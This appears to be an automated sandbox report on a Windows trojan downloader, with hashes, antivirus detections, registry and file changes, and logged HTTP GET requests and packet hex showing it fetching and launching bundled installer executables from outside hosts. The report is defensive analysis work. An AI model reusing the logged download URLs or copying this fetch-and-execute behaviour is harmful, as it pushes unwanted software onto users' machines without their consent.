Analysis Date2015-10-12 03:53:18
MD53d1fdaf93df063d20ab6239b435a323d
SHA1c550cdf852f23ae9249f6c50ac7113890fd1099b

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: ee49598e5341000cff0e1d7cbdea9432 sha1: 1a134291e65a1d7998da1c86706d3ccec1a98027 size: 491520
Section.rdata md5: e8edc950aa0cccc68b356b1129932bcb sha1: 853ca7bd360a988d3fe53c1c7c1b14172661ae5c size: 90112
Section.data md5: 66d30387f79b68b3145a038cc64a1e6e sha1: 26802b710b7fc986bc4939184a1a8c7ca491ddc0 size: 65536
Section.rsrc md5: a734838a96235e1de9a5c86fe4487acd sha1: a4f2c0d70a9e11031825f549c9cd9b8d2caac4a0 size: 57344
Timestamp2009-12-04 13:35:59
VersionLegalCopyright: 作者版权所有 请尊重并使用正版
FileVersion: 1.0.0.0
Comments: 本程序使用易语言编写(http://www.eyuyan.com)
ProductName: 易语言程序
ProductVersion: 1.0.0.0
FileDescription: 易语言程序
PackerMicrosoft Visual C++ v6.0
PEhash87d103a53a02915e1af5ac6cb368e15135f493bf
IMPhashe8ee258506bcb0dc3c18fc92188b80f6
AVCA (E-Trust Ino)no_virus
AVF-SecureTrojan:W32/DelfInject.R
AVDr. WebTrojan.KillProc.34948
AVClamAVno_virus
AVArcabit (arcavir)Gen:Variant.Buzy.3157
AVBullGuardGen:Variant.Buzy.3157
AVPadvishno_virus
AVVirusBlokAda (vba32)no_virus
AVCAT (quickheal)no_virus
AVTrend Microno_virus
AVKasperskyTrojan-Downloader.Win32.Generic
AVZillya!no_virus
AVEmsisoftGen:Variant.Buzy.3157
AVIkarusno_virus
AVFrisk (f-prot)W32/Agent.EW.gen!Eldorado
AVAuthentiumW32/Agent.EW.gen!Eldorado
AVMalwareBytesSpyware.OnlineGames
AVMicroWorld (escan)Gen:Variant.Buzy.3157
AVMicrosoft Security Essentialsno_virus
AVK7Backdoor ( 04c4bd361 )
AVBitDefenderGen:Variant.Buzy.3157
AVFortinetW32/Flystudio
AVSymantecno_virus
AVGrisoft (avg)no_virus
AVEset (nod32)no_virus
AVAlwil (avast)no_virus
AVAd-AwareGen:Variant.Buzy.3157
AVTwisterTrojanDldr.Generic.imxy
AVAvira (antivir)TR/Dldr.Agent.708608.25
AVMcafeeno_virus
AVRisingno_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Program Files\bdBrowserSetup-5956-ftn_1000149119.exe
Creates FileC:\Program Files\install1621416.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012015101220151013\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Program Files\bdsd_1454_7654_3488.exe
Creates FileC:\Program Files\360sd_7654_3488.exe
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Program Files\qhws_7654_3488.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Program Files\IQIYIsetup_l_spl004@kb019.exe
Creates FileC:\Program Files\qhse_7654_3488.exe
Creates FileC:\Program Files\bdws_1454_7654_3488.exe
Deletes FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\index.dat
Creates ProcessC:\Program Files\bdsd_1454_7654_3488.exe
Creates ProcessC:\Program Files\360sd_7654_3488.exe
Creates ProcessC:\Program Files\qhws_7654_3488.exe
Creates ProcessC:\Program Files\qhse_7654_3488.exe
Creates ProcessC:\Program Files\IQIYIsetup_l_spl004@kb019.exe
Creates ProcessC:\Program Files\install1621416.exe
Creates ProcessC:\Program Files\bdws_1454_7654_3488.exe
Creates ProcessC:\Program Files\bdBrowserSetup-5956-ftn_1000149119.exe
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!mshist012015101220151013!
Creates Mutex_!SHMSFTHISTORY!_
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNScj.99link.cc

Process
↳ C:\Program Files\install1621416.exe

Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\TEMP\scs2.tmp
Creates FileC:\PROGRA~1\INSTAL~1.EXE
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\WINDOWS\TEMP\scs1.tmp
Deletes FileC:\WINDOWS\TEMP\scs1.tmp
Deletes FileC:\WINDOWS\TEMP\scs2.tmp

Process
↳ C:\Program Files\IQIYIsetup_l_spl004@kb019.exe

Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\TEMP\scs4.tmp
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\WINDOWS\TEMP\scs3.tmp
Creates FileC:\PROGRA~1\IQIYIS~1.EXE
Deletes FileC:\WINDOWS\TEMP\scs4.tmp
Deletes FileC:\WINDOWS\TEMP\scs3.tmp

Process
↳ C:\Program Files\qhse_7654_3488.exe

Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\TEMP\scs5.tmp
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\PROGRA~1\QHSE_7~1.EXE
Creates FileC:\WINDOWS\TEMP\scs6.tmp
Deletes FileC:\WINDOWS\TEMP\scs5.tmp
Deletes FileC:\WINDOWS\TEMP\scs6.tmp

Process
↳ C:\Program Files\360sd_7654_3488.exe

Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\WINDOWS\TEMP\scs7.tmp
Creates FileC:\WINDOWS\TEMP\scs8.tmp
Creates FileC:\PROGRA~1\360SD_~1.EXE
Deletes FileC:\WINDOWS\TEMP\scs8.tmp
Deletes FileC:\WINDOWS\TEMP\scs7.tmp

Process
↳ C:\Program Files\bdsd_1454_7654_3488.exe

Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\TEMP\scsA.tmp
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\PROGRA~1\BDSD_1~1.EXE
Creates FileC:\WINDOWS\TEMP\scs9.tmp
Deletes FileC:\WINDOWS\TEMP\scsA.tmp
Deletes FileC:\WINDOWS\TEMP\scs9.tmp

Process
↳ C:\Program Files\qhws_7654_3488.exe

Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\WINDOWS\TEMP\scsC.tmp
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\TEMP\scsB.tmp
Creates FileC:\PROGRA~1\QHWS_7~1.EXE
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Deletes FileC:\WINDOWS\TEMP\scsC.tmp
Deletes FileC:\WINDOWS\TEMP\scsB.tmp

Process
↳ C:\Program Files\bdBrowserSetup-5956-ftn_1000149119.exe

Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\WINDOWS\TEMP\scsD.tmp
Creates FileC:\WINDOWS\TEMP\scsE.tmp
Creates FileC:\PROGRA~1\BDBROW~1.EXE
Deletes FileC:\WINDOWS\TEMP\scsD.tmp
Deletes FileC:\WINDOWS\TEMP\scsE.tmp

Process
↳ C:\Program Files\bdws_1454_7654_3488.exe

Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\WINDOWS\TEMP\scsF.tmp
Creates FileC:\WINDOWS\TEMP\scs10.tmp
Creates FileC:\PROGRA~1\BDWS_1~1.EXE
Deletes FileC:\WINDOWS\TEMP\scsF.tmp
Deletes FileC:\WINDOWS\TEMP\scs10.tmp

Network Details:

DNSgnop008.tlgslb.com
Type: A
59.39.31.109
DNSgnop008.tlgslb.com
Type: A
59.39.31.110
DNSgnop008.tlgslb.com
Type: A
59.39.31.122
DNSgnop008.tlgslb.com
Type: A
59.39.31.123
DNSgnop008.tlgslb.com
Type: A
59.39.31.124
DNSgnop008.tlgslb.com
Type: A
59.39.31.125
DNSgnop008.tlgslb.com
Type: A
59.39.31.126
DNSgnop008.tlgslb.com
Type: A
59.39.31.106
DNSgnop008.tlgslb.com
Type: A
59.39.31.107
DNSgnop008.tlgslb.com
Type: A
59.39.31.108
DNSdownload.pps.tv.webscache.com
Type: A
119.188.40.81
DNS1st.dlmix.ourdvs.com
Type: A
8.37.235.13
DNS1st.dlmix.ourdvs.com
Type: A
8.37.235.14
DNS1st.dlmix.ourdvs.com
Type: A
8.37.234.9
DNS1st.dlmix.ourdvs.com
Type: A
8.37.234.10
DNS1st.dlmix.ourdvs.com
Type: A
8.37.234.11
DNS1st.dlmix.ourdvs.com
Type: A
8.37.234.12
DNS1st.dlmix.ourdvs.com
Type: A
8.37.235.11
DNS1st.dlmix.ourdvs.com
Type: A
8.37.235.12
DNSbrdlsw.jomodns.com
Type: A
118.123.210.46
DNScj.99link.cc
Type: A
DNSdownload.suxiazai.com
Type: A
DNSdl.static.iqiyi.com
Type: A
DNSdown.7654.com
Type: A
DNSdlsw.br.baidu.com
Type: A
HTTP GEThttp://download.suxiazai.com/for_down/2013/install1621416.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://dl.static.iqiyi.com/hz/IQIYIsetup_l_spl004@kb019.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://down.7654.com/downloads/package_one/qhse_7654_3488.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://down.7654.com/downloads/package_one/360sd_7654_3488.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://down.7654.com/downloads/package_one/bdsd_1454_7654_3488.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://down.7654.com/downloads/package_one/qhws_7654_3488.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://dlsw.br.baidu.com/ditui/zujian/bdBrowserSetup-5956-ftn_1000149119.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://down.7654.com/downloads/package_one/bdws_1454_7654_3488.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1033 ➝ 59.39.31.109:80
Flows TCP192.168.1.1:1034 ➝ 119.188.40.81:80
Flows TCP192.168.1.1:1035 ➝ 8.37.235.13:80
Flows TCP192.168.1.1:1036 ➝ 8.37.235.13:80
Flows TCP192.168.1.1:1037 ➝ 8.37.235.13:80
Flows TCP192.168.1.1:1038 ➝ 8.37.235.13:80
Flows TCP192.168.1.1:1039 ➝ 118.123.210.46:80
Flows TCP192.168.1.1:1040 ➝ 8.37.235.13:80

Raw Pcap
0x00000000 (00000)   47455420 2f666f72 5f646f77 6e2f3230   GET /for_down/20
0x00000010 (00016)   31332f69 6e737461 6c6c3136 32313431   13/install162141
0x00000020 (00032)   362e6578 65204854 54502f31 2e310d0a   6.exe HTTP/1.1..
0x00000030 (00048)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000040 (00064)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000050 (00080)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x00000060 (00096)   696e646f 7773204e 5420352e 30290d0a   indows NT 5.0)..
0x00000070 (00112)   41636365 70743a20 2a2f2a0d 0a486f73   Accept: */*..Hos
0x00000080 (00128)   743a2064 6f776e6c 6f61642e 73757869   t: download.suxi
0x00000090 (00144)   617a6169 2e636f6d 0d0a4361 6368652d   azai.com..Cache-
0x000000a0 (00160)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x000000b0 (00176)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f687a2f 49514959 49736574   GET /hz/IQIYIset
0x00000010 (00016)   75705f6c 5f73706c 30303440 6b623031   up_l_spl004@kb01
0x00000020 (00032)   392e6578 65204854 54502f31 2e310d0a   9.exe HTTP/1.1..
0x00000030 (00048)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000040 (00064)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000050 (00080)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x00000060 (00096)   696e646f 7773204e 5420352e 30290d0a   indows NT 5.0)..
0x00000070 (00112)   41636365 70743a20 2a2f2a0d 0a486f73   Accept: */*..Hos
0x00000080 (00128)   743a2064 6c2e7374 61746963 2e697169   t: dl.static.iqi
0x00000090 (00144)   79692e63 6f6d0d0a 43616368 652d436f   yi.com..Cache-Co
0x000000a0 (00160)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000b0 (00176)   0a0d0a0d 0a                           .....

0x00000000 (00000)   47455420 2f646f77 6e6c6f61 64732f70   GET /downloads/p
0x00000010 (00016)   61636b61 67655f6f 6e652f71 6873655f   ackage_one/qhse_
0x00000020 (00032)   37363534 5f333438 382e6578 65204854   7654_3488.exe HT
0x00000030 (00048)   54502f31 2e310d0a 55736572 2d416765   TP/1.1..User-Age
0x00000040 (00064)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000050 (00080)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000060 (00096)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000070 (00112)   5420352e 30290d0a 41636365 70743a20   T 5.0)..Accept: 
0x00000080 (00128)   2a2f2a0d 0a486f73 743a2064 6f776e2e   */*..Host: down.
0x00000090 (00144)   37363534 2e636f6d 0d0a4361 6368652d   7654.com..Cache-
0x000000a0 (00160)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x000000b0 (00176)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f646f77 6e6c6f61 64732f70   GET /downloads/p
0x00000010 (00016)   61636b61 67655f6f 6e652f33 36307364   ackage_one/360sd
0x00000020 (00032)   5f373635 345f3334 38382e65 78652048   _7654_3488.exe H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e30290d 0a416363 6570743a   NT 5.0)..Accept:
0x00000080 (00128)   202a2f2a 0d0a486f 73743a20 646f776e    */*..Host: down
0x00000090 (00144)   2e373635 342e636f 6d0d0a43 61636865   .7654.com..Cache
0x000000a0 (00160)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000b0 (00176)   68650d0a 0d0a                         he....

0x00000000 (00000)   47455420 2f646f77 6e6c6f61 64732f70   GET /downloads/p
0x00000010 (00016)   61636b61 67655f6f 6e652f62 6473645f   ackage_one/bdsd_
0x00000020 (00032)   31343534 5f373635 345f3334 38382e65   1454_7654_3488.e
0x00000030 (00048)   78652048 5454502f 312e310d 0a557365   xe HTTP/1.1..Use
0x00000040 (00064)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000050 (00080)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000060 (00096)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000070 (00112)   6f777320 4e542035 2e30290d 0a416363   ows NT 5.0)..Acc
0x00000080 (00128)   6570743a 202a2f2a 0d0a486f 73743a20   ept: */*..Host: 
0x00000090 (00144)   646f776e 2e373635 342e636f 6d0d0a43   down.7654.com..C
0x000000a0 (00160)   61636865 2d436f6e 74726f6c 3a206e6f   ache-Control: no
0x000000b0 (00176)   2d636163 68650d0a 0d0a                -cache....

0x00000000 (00000)   47455420 2f646f77 6e6c6f61 64732f70   GET /downloads/p
0x00000010 (00016)   61636b61 67655f6f 6e652f71 6877735f   ackage_one/qhws_
0x00000020 (00032)   37363534 5f333438 382e6578 65204854   7654_3488.exe HT
0x00000030 (00048)   54502f31 2e310d0a 55736572 2d416765   TP/1.1..User-Age
0x00000040 (00064)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000050 (00080)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000060 (00096)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000070 (00112)   5420352e 30290d0a 41636365 70743a20   T 5.0)..Accept: 
0x00000080 (00128)   2a2f2a0d 0a486f73 743a2064 6f776e2e   */*..Host: down.
0x00000090 (00144)   37363534 2e636f6d 0d0a4361 6368652d   7654.com..Cache-
0x000000a0 (00160)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x000000b0 (00176)   650d0a0d 0a650d0a 0d0a                e....e....

0x00000000 (00000)   47455420 2f646974 75692f7a 756a6961   GET /ditui/zujia
0x00000010 (00016)   6e2f6264 42726f77 73657253 65747570   n/bdBrowserSetup
0x00000020 (00032)   2d353935 362d6674 6e5f3130 30303134   -5956-ftn_100014
0x00000030 (00048)   39313139 2e657865 20485454 502f312e   9119.exe HTTP/1.
0x00000040 (00064)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000050 (00080)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000060 (00096)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000070 (00112)   3b205769 6e646f77 73204e54 20352e30   ; Windows NT 5.0
0x00000080 (00128)   290d0a41 63636570 743a202a 2f2a0d0a   )..Accept: */*..
0x00000090 (00144)   486f7374 3a20646c 73772e62 722e6261   Host: dlsw.br.ba
0x000000a0 (00160)   6964752e 636f6d0d 0a436163 68652d43   idu.com..Cache-C
0x000000b0 (00176)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x000000c0 (00192)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f646f77 6e6c6f61 64732f70   GET /downloads/p
0x00000010 (00016)   61636b61 67655f6f 6e652f62 6477735f   ackage_one/bdws_
0x00000020 (00032)   31343534 5f373635 345f3334 38382e65   1454_7654_3488.e
0x00000030 (00048)   78652048 5454502f 312e310d 0a557365   xe HTTP/1.1..Use
0x00000040 (00064)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000050 (00080)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000060 (00096)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000070 (00112)   6f777320 4e542035 2e30290d 0a416363   ows NT 5.0)..Acc
0x00000080 (00128)   6570743a 202a2f2a 0d0a486f 73743a20   ept: */*..Host: 
0x00000090 (00144)   646f776e 2e373635 342e636f 6d0d0a43   down.7654.com..C
0x000000a0 (00160)   61636865 2d436f6e 74726f6c 3a206e6f   ache-Control: no
0x000000b0 (00176)   2d636163 68650d0a 0d0a2d63 61636865   -cache....-cache
0x000000c0 (00192)   0d0a0d0a                              ....


Strings